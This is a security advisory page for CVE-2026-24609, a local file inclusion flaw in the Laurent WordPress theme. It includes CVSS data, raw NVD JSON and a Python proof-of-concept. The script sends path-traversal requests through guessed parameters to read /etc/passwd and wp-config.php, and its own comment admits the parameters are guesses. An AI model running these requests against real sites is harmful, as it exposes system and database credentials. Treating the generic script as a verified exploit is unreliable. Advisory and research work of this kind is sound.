Security Vulnerability Report
中文
CVE-2026-24609 CVSS 7.5 HIGH

CVE-2026-24609

Published: 2026-01-23 15:16:20
Last Modified: 2026-04-15 00:35:42

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Elated-Themes Laurent laurent allows PHP Local File Inclusion.This issue affects Laurent: from n/a through <= 3.1.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Laurent <= 3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-24609 PoC - Laurent Theme Local File Inclusion # Target: WordPress site using Laurent theme <= 3.1 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2026-24609 """ # Common vulnerable parameter - adjust based on actual testing vulnerable_params = [ '?file=../../../../../../etc/passwd', '?template=../../../../../../wp-config.php', '?page=../../../../../../etc/passwd' ] for param in vulnerable_params: full_url = target_url.rstrip('/') + param try: response = requests.get(full_url, timeout=10) # Check if file content is leaked if 'root:' in response.text or 'DB_NAME' in response.text: return True, full_url except requests.RequestException: continue return False, None def main(): if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://example.com") sys.exit(1) target = sys.argv[1] print(f"[*] Testing target: {target}") print(f"[*] CVE-2026-24609 - Laurent Theme LFI") is_vulnerable, exploit_url = check_vulnerability(target) if is_vulnerable: print(f"[!] Target is VULNERABLE!") print(f"[!] Exploit URL: {exploit_url}") else: print(f"[*] Target appears NOT vulnerable") print(f"[*] Manual testing recommended") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24609", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:19.850", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Elated-Themes Laurent laurent allows PHP Local File Inclusion.This issue affects Laurent: from n/a through <= 3.1."}, {"lang": "es", "value": "Control inadecuado del nombre de fichero para la declaración include/require en programa PHP ('PHP Remote File Inclusion') en Elated-Themes Laurent laurent, permite inclusión local de ficheros PHP. Este problema afecta a Laurent: desde n/a hasta &lt;= 3.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/laurent/vulnerability/wordpress-laurent-theme-3-1-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}